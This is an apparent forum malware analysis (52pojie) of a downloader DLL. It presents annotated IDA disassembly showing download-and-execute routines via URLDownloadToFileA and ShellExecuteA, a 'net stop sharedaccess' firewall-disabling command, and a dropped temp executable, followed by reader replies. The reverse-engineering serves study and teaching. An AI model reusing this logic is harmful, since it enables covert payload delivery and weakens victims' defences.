.text:10001219       or    ecx, 0FFFFFFFFh
.text:1000121C       repne scasb
.text:1000121E       mov ecx, ebx
.text:10001220       dec edi
.text:10001221       shr ecx, 2
.text:10001224       rep movsd
.text:10001226       mov ecx, ebx
.text:10001228       lea eax,
.text:1000122F       and ecx, 3
.text:10001232       push eax       ; Filename
.text:10001233       rep movsb
.text:10001235       call ds:fopen    ; 打开dll自身,读取配置信息.
.text:1000123B       mov esi, eax
.text:1000123D       add esp, 8
.text:10001240       test esi, esi
.text:10001242       jnz short loc_1000125D
.text:10001244       push offset aOpenDllFailed_ ; "open dll failed..."
.text:10001249       call ds:OutputDebugStringA
.text:1000124F       pop edi
.text:10001250       pop esi
.text:10001251       xor eax, eax
.text:10001253       pop ebx
.text:10001254       add esp, 648h
.text:1000125A       retn 4
.text:1000125D ; ---------------------------------------------------------------------------
.text:1000125D
.text:1000125D loc_1000125D:             ; CODE XREF: StartAddress+82j
.text:1000125D       mov edi, ds:fseek
.text:10001263       push 2          ; Origin
.text:10001265       push 0FFFFFF82h ; Offset
.text:10001267       push esi       ; File
.text:10001268       call edi ; fseek
.text:1000126A       mov ebx, ds:fread
.text:10001270       push esi       ; File
.text:10001271       push 1          ; Count
.text:10001273       lea ecx,
.text:10001277       push 1          ; ElementSize
.text:10001279       push ecx       ; DstBuf
.text:1000127A       call ebx ; fread
.text:1000127C       mov al,
.text:10001280       xor edx, edx
.text:10001282       cmp al, 59h
.text:10001284       push 2          ; Origin
.text:10001286       setz dl
.text:10001289       push 0FFFFFF83h ; Offset
.text:1000128B       push esi       ; File
.text:1000128C       mov dword_10003178, edx
.text:10001292       call edi ; fseek
.text:10001294       push esi       ; File
.text:10001295       push 1          ; Count
.text:10001297       lea eax,
.text:1000129B       push 1          ; ElementSize
.text:1000129D       push eax       ; DstBuf
.text:1000129E       call ebx ; fread
.text:100012A0       mov al,
.text:100012A4       xor ecx, ecx
.text:100012A6       cmp al, 59h
.text:100012A8       push 2          ; Origin
.text:100012AA       setz cl
.text:100012AD       push 0FFFFFF85h ; Offset
.text:100012AF       push esi       ; File
.text:100012B0       mov dword_10003174, ecx
.text:100012B6       call edi ; fseek
.text:100012B8       add esp, 44h
.text:100012BB       lea edx,
.text:100012BF       push esi       ; File
.text:100012C0       push 1          ; Count
.text:100012C2       push 1          ; ElementSize
.text:100012C4       push edx       ; DstBuf
.text:100012C5       call ebx ; fread
.text:100012C7       mov dl,
.text:100012CB       xor eax, eax
.text:100012CD       cmp dl, 59h
.text:100012D0       push 2          ; Origin
.text:100012D2       setz al
.text:100012D5       push 0FFFFFF86h ; Offset
.text:100012D7       push esi       ; File
.text:100012D8       mov dword_10003170, eax
.text:100012DD       call edi ; fseek
.text:100012DF       push esi       ; File
.text:100012E0       push 1          ; Count
.text:100012E2       push 64h       ; ElementSize
.text:100012E4       push offset byte_10003564 ; DstBuf
.text:100012E9       call ebx ; fread
.text:100012EB       push esi       ; File
.text:100012EC       call ds:fclose
.text:100012F2       mov eax, dword_10003170
.text:100012F7       add esp, 30h
.text:100012FA       test eax, eax
.text:100012FC       jz    loc_10001521
.text:10001302       push 63h
.text:10001304       push offset byte_10003564
.text:10001309       call URL_Decode
.text:1000130E       add esp, 8
.text:10001311       push 0          ; LPBINDSTATUSCALLBACK
.text:10001313       push 0          ; DWORD
.text:10001315       push offset FileName ; "C:\\Progra~1\\url.txt"
.text:1000131A       push offset byte_10003564 ; LPCSTR
.text:1000131F       push 0          ; LPUNKNOWN
.text:10001321       call URLDownloadToFileA
.text:10001326       push offset FileName ; "C:\\Progra~1\\url.txt"
.text:1000132B       call ds:GetFileAttributesA
.text:10001331       cmp eax, 0FFFFFFFFh
.text:10001334       jnz short loc_1000134F
.text:10001336       push offset aDown_exeInvali ; "down.exe:invalid url or empty page, ple"...
.text:1000133B       call ds:OutputDebugStringA
.text:10001341       pop edi
.text:10001342       pop esi
.text:10001343       xor eax, eax
.text:10001345       pop ebx
.text:10001346       add esp, 648h
.text:1000134C       retn 4
.text:1000134F ; ---------------------------------------------------------------------------
.text:1000134F
.text:1000134F loc_1000134F:             ; CODE XREF: StartAddress+174j
.text:1000134F       mov ecx, 18h
.text:10001354       xor eax, eax
.text:10001356       lea edi,
.text:1000135D       mov , 0
.text:10001365       rep stosd
.text:10001367       stosw
.text:10001369       push ebp
.text:1000136A       push offset aR ; "r+"
.text:1000136F       push offset FileName ; "C:\\Progra~1\\url.txt"
.text:10001374       xor ebp, ebp
.text:10001376       mov , 3E8h
.text:1000137E       stosb
.text:1000137F       call ds:fopen    ; 打开下载下来的地址表url.txt
.text:10001385       mov esi, eax
.text:10001387       add esp, 8
.text:1000138A       test esi, esi
.text:1000138C       mov , esi
.text:10001390       jz    loc_1000146B
.text:10001396       mov ecx, 0F9h
.text:1000139B       xor eax, eax
.text:1000139D       lea edi,
.text:100013A4       mov , 0
.text:100013AC       rep stosd
.text:100013AE       stosw
.text:100013B0       push esi       ; File
.text:100013B1       push 1          ; Count
.text:100013B3       lea ecx,
.text:100013BA       push 3E8h       ; ElementSize
.text:100013BF       push ecx       ; DstBuf
.text:100013C0       stosb
.text:100013C1       call ebx ; fread ; 读出N多地址, 下面是循环分析出每一个地址.
.text:100013C3       add esp, 10h
.text:100013C6       mov , offset unk_1000317C
.text:100013CE
.text:100013CE loc_100013CE:             ; CODE XREF: StartAddress+290j
.text:100013CE       cmp , 0Ah
.text:100013D6       jnz short loc_10001449
.text:100013D8       lea ebx,
.text:100013DB       lea edx,
.text:100013E2       push ebx       ; iMaxLength
.text:100013E3       lea eax,
.text:100013EA       push edx       ; lpString2
.text:100013EB       push eax       ; lpString1
.text:100013EC       call ds:lstrcpynA
.text:100013F2       lea edi,
.text:100013F9       or    ecx, 0FFFFFFFFh
.text:100013FC       xor eax, eax
.text:100013FE       push ebx
.text:100013FF       repne scasb
.text:10001401       not ecx
.text:10001403       sub edi, ecx
.text:10001405       lea eax,
.text:1000140C       mov edx, ecx
.text:1000140E       mov esi, edi
.text:10001410       mov edi,
.text:10001414       push eax
.text:10001415       shr ecx, 2
.text:10001418       rep movsd
.text:1000141A       mov ecx, edx
.text:1000141C       and ecx, 3
.text:1000141F       rep movsb
.text:10001421       call sub_10001060
.text:10001426       mov edx,
.text:1000142A       mov eax,
.text:1000142E       mov esi,
.text:10001432       or    ecx, 0FFFFFFFFh
.text:10001435       sub ecx, ebp
.text:10001437       add esp, 8
.text:1000143A       add edx, ecx
.text:1000143C       xor ebp, ebp
.text:1000143E       add eax, 64h
.text:10001441       mov , edx
.text:10001445       mov , eax
.text:10001449
.text:10001449 loc_10001449:             ; CODE XREF: StartAddress+216j
.text:10001449       mov eax,
.text:1000144D       inc ebp
.text:1000144E       cmp ebp, eax
.text:10001450       jl    loc_100013CE
.text:10001456       push esi       ; File
.text:10001457       call ds:fclose
.text:1000145D       add esp, 4
.text:10001460       push offset FileName ; "C:\\Progra~1\\url.txt"
.text:10001465       call ds:DeleteFileA
.text:1000146B
.text:1000146B loc_1000146B:             ; CODE XREF: StartAddress+1D0j
.text:1000146B       mov ebx, ds:CreateThread ; 这个标签就是直接下载exe文件执行. 可以看出这款下载器有两种模式,
.text:1000146B                            ; 一种是直接下载exe执行,一种是下载地址表解析出地址执行.
.text:10001471       mov ecx, 13h
.text:10001476       xor eax, eax
.text:10001478       lea edi,
.text:1000147C       mov , 0
.text:10001484       lea ebp,
.text:10001488       rep stosd
.text:1000148A       mov edi, offset unk_1000317C
.text:1000148F
.text:1000148F loc_1000148F:             ; CODE XREF: StartAddress+32Aj
.text:1000148F       mov esi, offset unk_100035C8
.text:10001494       mov eax, edi
.text:10001496
.text:10001496 loc_10001496:             ; CODE XREF: StartAddress+2F4j
.text:10001496       mov dl,
.text:10001498       mov cl, dl
.text:1000149A       cmp dl,
.text:1000149C       jnz short loc_100014BA
.text:1000149E       test cl, cl
.text:100014A0       jz    short loc_100014B6
.text:100014A2       mov dl,
.text:100014A5       mov cl, dl
.text:100014A7       cmp dl,
.text:100014AA       jnz short loc_100014BA
.text:100014AC       add eax, 2
.text:100014AF       add esi, 2
.text:100014B2       test cl, cl
.text:100014B4       jnz short loc_10001496
.text:100014B6
.text:100014B6 loc_100014B6:             ; CODE XREF: StartAddress+2E0j
.text:100014B6       xor eax, eax
.text:100014B8       jmp short loc_100014BF
.text:100014BA ; ---------------------------------------------------------------------------
.text:100014BA
.text:100014BA loc_100014BA:             ; CODE XREF: StartAddress+2DCj
.text:100014BA                            ; StartAddress+2EAj
.text:100014BA       sbb eax, eax
.text:100014BC       sbb eax, 0FFFFFFFFh
.text:100014BF
.text:100014BF loc_100014BF:             ; CODE XREF: StartAddress+2F8j
.text:100014BF       test eax, eax
.text:100014C1       jz    short loc_100014DE
.text:100014C3       push 0          ; lpThreadId
.text:100014C5       push 0          ; dwCreationFlags
.text:100014C7       push edi       ; lpParameter
.text:100014C8       push offset sub_100010A0 ; lpStartAddress
.text:100014CD       push 0          ; dwStackSize
.text:100014CF       push 0          ; lpThreadAttributes
.text:100014D1       call ebx ; CreateThread
.text:100014D3       push 63h       ; dwMilliseconds
.text:100014D5       mov , eax
.text:100014D8       call ds:Sleep
.text:100014DE
.text:100014DE loc_100014DE:             ; CODE XREF: StartAddress+301j
.text:100014DE       add edi, 64h
.text:100014E1       add ebp, 4
.text:100014E4       cmp edi, 1000394Ch
.text:100014EA       jl    short loc_1000148F
.text:100014EC       mov ebx, ds:WaitForSingleObject
.text:100014F2       mov ebp, ds:CloseHandle
.text:100014F8       lea edi,
.text:100014FC       mov , 14h
.text:10001504
.text:10001504 loc_10001504:             ; CODE XREF: StartAddress+35Ej
.text:10001504       mov esi,
.text:10001506       test esi, esi
.text:10001508       jz    short loc_10001512
.text:1000150A       push 0FFFFFFFFh ; dwMilliseconds
.text:1000150C       push esi       ; hHandle
.text:1000150D       call ebx ; WaitForSingleObject
.text:1000150F       push esi       ; hObject
.text:10001510       call ebp ; CloseHandle
.text:10001512
.text:10001512 loc_10001512:             ; CODE XREF: StartAddress+348j
.text:10001512       mov eax,
.text:10001516       add edi, 4
.text:10001519       dec eax
.text:1000151A       mov , eax
.text:1000151E       jnz short loc_10001504
.text:10001520       pop ebp
.text:10001521
.text:10001521 loc_10001521:             ; CODE XREF: StartAddress+13Cj
.text:10001521       mov eax, dword_10003174
.text:10001526       test eax, eax
.text:10001528       jz    short loc_10001537
.text:1000152A       push 0          ; uCmdShow
.text:1000152C       push offset CmdLine ; "net stop sharedaccess"
.text:10001531       call ds:WinExec
.text:10001537
.text:10001537 loc_10001537:             ; CODE XREF: StartAddress+368j
.text:10001537       mov ecx, 41h
.text:1000153C       xor eax, eax
.text:1000153E       lea edi,
.text:10001545       push 104h       ; uSize
.text:1000154A       rep stosd
.text:1000154C       lea eax,
.text:10001553       push eax       ; lpBuffer
.text:10001554       call ds:GetWindowsDirectoryA
.text:1000155A       mov edi, offset aTempIlovexd_ex ; "\\temp\\ilovexd.exe"
.text:1000155F       or    ecx, 0FFFFFFFFh
.text:10001562       xor eax, eax
.text:10001564       lea edx,
.text:1000156B       repne scasb
.text:1000156D       not ecx
.text:1000156F       sub edi, ecx
.text:10001571       push 63h
.text:10001573       mov esi, edi
.text:10001575       mov ebx, ecx
.text:10001577       mov edi, edx
.text:10001579       or    ecx, 0FFFFFFFFh
.text:1000157C       repne scasb
.text:1000157E       mov ecx, ebx
.text:10001580       dec edi
.text:10001581       shr ecx, 2
.text:10001584       rep movsd
.text:10001586       mov ecx, ebx
.text:10001588       push offset byte_10003564
.text:1000158D       and ecx, 3
.text:10001590       rep movsb
.text:10001592       call URL_Decode ; url解密.
.text:10001597       add esp, 8
.text:1000159A       lea eax,
.text:100015A1       push 0          ; LPBINDSTATUSCALLBACK
.text:100015A3       push 0          ; DWORD
.text:100015A5       push eax       ; LPCSTR
.text:100015A6       push offset byte_10003564 ; LPCSTR
.text:100015AB       push 0          ; LPUNKNOWN
.text:100015AD       call URLDownloadToFileA
.text:100015B2       lea ecx,
.text:100015B9       push ecx       ; lpFileName
.text:100015BA       call ds:GetFileAttributesA
.text:100015C0       cmp eax, 0FFFFFFFFh
.text:100015C3       jnz short loc_100015DE
.text:100015C5       push offset aDllDownloadFai ; "dll:download failed... check url.."
.text:100015CA       call ds:OutputDebugStringA
.text:100015D0       pop edi
.text:100015D1       pop esi
.text:100015D2       xor eax, eax
.text:100015D4       pop ebx
.text:100015D5       add esp, 648h
.text:100015DB       retn 4
.text:100015DE ; ---------------------------------------------------------------------------
.text:100015DE
.text:100015DE loc_100015DE:             ; CODE XREF: StartAddress+403j
.text:100015DE       mov ebx, ds:ShellExecuteA
.text:100015E4       push 0          ; nShowCmd
.text:100015E6       push 0          ; lpDirectory
.text:100015E8       lea edx,
.text:100015EF       push 0          ; lpParameters
.text:100015F1       push edx       ; lpFile
.text:100015F2       push offset Operation ; "open"
.text:100015F7       push 0          ; hwnd
.text:100015F9       call ebx ; ShellExecuteA
.text:100015FB       mov ecx, 8
.text:10001600       mov esi, offset a?QG0fccciekl7r ; "?$%*q}~'()?FCCC塃K?R嶸I=>N?朠NR"
.text:10001605       lea edi, ; 这个单独的url很奇怪,每个配出来下载者在最后都会去下
.text:10001605                            ; 载这个地址上的东西并执行(我用OD解过这个字符串,是个
.text:10001605                            ; exe的地址,不过已经失效). 不知道是用于什么目的的,
.text:10001605                            ; 更新? 统计? 还是后门 ?因为这些地址全部失效现在也
.text:10001605                            ; 无法得知了.
.text:10001609       xor eax, eax
.text:1000160B       rep movsd
.text:1000160D       movsw
.text:1000160F       mov ecx, 6
.text:10001614       mov esi, offset aCProgra1Ojhnjk ; "C:\\Progra~1\\OJhnjksLC.exe"
.text:10001619       lea edi,
.text:10001620       mov , eax
.text:10001624       rep movsd
.text:10001626       mov , eax
.text:1000162A       mov ecx, 12h
.text:1000162F       movsw
.text:10001631       mov , eax
.text:10001635       lea edi,
.text:1000163C       mov , eax
.text:10001640       push 57h
.text:10001642       rep stosd
.text:10001644       lea ecx,
.text:10001648       push ecx
.text:10001649       stosw
.text:1000164B       call URL_Decode ; 对作者自己的url解密.
.text:10001650       add esp, 8
.text:10001653       lea edx,
.text:1000165A       lea eax,
.text:1000165E       push 0          ; LPBINDSTATUSCALLBACK
.text:10001660       push 0          ; DWORD
.text:10001662       push edx       ; LPCSTR
.text:10001663       push eax       ; LPCSTR
.text:10001664       push 0          ; LPUNKNOWN
.text:10001666       call URLDownloadToFileA
.text:1000166B       push 0          ; nShowCmd
.text:1000166D       push 0          ; lpDirectory
.text:1000166F       lea ecx,
.text:10001676       push 0          ; lpParameters
.text:10001678       push ecx       ; lpFile
.text:10001679       push offset Operation ; "open"
.text:1000167E       push 0          ; hwnd
.text:10001680       call ebx ; ShellExecuteA
.text:10001682       pop edi
.text:10001683       pop esi
.text:10001684       mov eax, 1
.text:10001689       pop ebx
.text:1000168A       add esp, 648h
.text:10001690       retn 4
.text:10001690 StartAddress endp
.text:10001690

好了, 就分析到这里吧 . 希望对新入门的菜鸟朋友有些帮助 .

附件中分别为exe和dll的idb文件及病毒样本(因含有驱动,若动态调试请在虚拟机中进行).

mycsy 发表于 2009-5-11 12:16

太过强大需要慢慢看 ……

lzzt 发表于 2009-5-24 12:25

研究下!!!!!!

xxxfree 发表于 2009-5-28 13:02

努力学习IDA,感谢楼主的文章，学习:)

花的世界 发表于 2009-5-31 17:46

研究下!!!!!!

xiaoxiao86 发表于 2009-6-1 09:21

驱动的下载者不知变异吗

123321a 发表于 2009-7-10 16:34

感谢楼主的文章，学习

juniper 发表于 2009-7-22 13:27

现在病毒的门槛越来越低了

让我们普通人就更加麻烦了

什么都的注意啦

microsaint 发表于 2009-9-16 03:06

收下了研究研究 ....

页: [1]

吾爱破解 - 52pojie.cn's Archiver

对某款驱动级下载者的分析